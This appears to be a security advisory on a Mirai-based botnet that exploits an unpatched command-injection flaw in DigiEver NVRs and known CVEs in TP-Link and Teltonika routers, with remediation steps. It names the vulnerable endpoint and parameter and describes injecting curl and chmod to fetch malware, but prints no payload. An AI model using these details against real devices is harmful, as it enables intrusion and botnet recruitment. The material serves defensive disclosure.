Analysis Summary

An unpatched remote code execution vulnerability in DigiEver DS-2105 Pro NVRs that has not been assigned a tracker number is being actively exploited by a new Mirai-based botnet. Targeting many network video recorders and TP-Link routers with out-of-date firmware, the campaign began in October.

Researchers uncovered one of the flaws exploited in the campaign and presented it at the DefCamp security conference in Bucharest, Romania, last year. Multiple DVR devices are impacted by the problem, the researcher stated at the time. Researchers noticed that the botnet began taking advantage of the vulnerability in the middle of November, but they also discovered indications that the campaign had been running since at least September. The latest Mirai malware variant targets CVE-2018-17532 on Teltonika RUT9XX routers and CVE-2023-1389 on TP-Link devices in addition to the DigiEver vulnerability.

The '/cgi-bin/cgi_main.cgi' URI, which incorrectly validates user inputs, is the target of the remote code execution (RCE) vulnerability that was used to compromise DigiEver NVRs. Because of this, remote, unauthenticated attackers can use specific parameters, including the ntp field in HTTP POST requests, to inject commands like "curl" and "chmod." According to researchers, the attacks that this Mirai-based botnet has shown resemble the ones that the presentation outlines.

The attackers recruit the device into the malware's botnet by using command injection to retrieve the malware binary from an external server. Cron tasks are added for persistence. After the device has been infiltrated, exploit sets and credential lists are utilized to either spread to other devices or carry out distributed denial of service (DDoS) attacks. The new Mirai variant is noteworthy for targeting a wide variety of system architectures, such as x86, ARM, and MIPS, and for using XOR and ChaCha20 encryption.

While using sophisticated decryption techniques is not new, it does indicate that Mirai-based botnet operators are changing their strategies, methods, and practices. Since many Mirai-based botnets still rely on the original string obfuscation logic from recycled code that was part of the original Mirai malware source code release, this is very noteworthy.

Impact

• Code Execution
• Unauthorized Access
• Denial of Service

Indicators of Compromise

Remediation

• Block all threat indicators at your respective controls.
• Search for indicators of compromise (IOCs) in your environment utilizing your respective security controls.
• Regularly update firmware on all network devices, especially those identified as vulnerable.
• Implement strict access controls to limit the exposure of network device interfaces on the internet.
• Use advanced DDoS mitigation services and solutions that can handle high packet and bit rate attacks.
• Conduct frequent security audits and vulnerability assessments on network infrastructure.
• Employ network segmentation to isolate critical infrastructure and reduce the attack surface.
• Increase monitoring and detection capabilities to quickly identify and respond to unusual traffic patterns.
• Collaborate with device manufacturers to address and patch security vulnerabilities promptly.
• Educate and inform users and administrators about the importance of timely updates and secure configurations.
• Implement robust firewall and intrusion prevention systems to filter malicious traffic.
• Develop and maintain an incident response plan to handle DDoS attacks effectively and minimize downtime.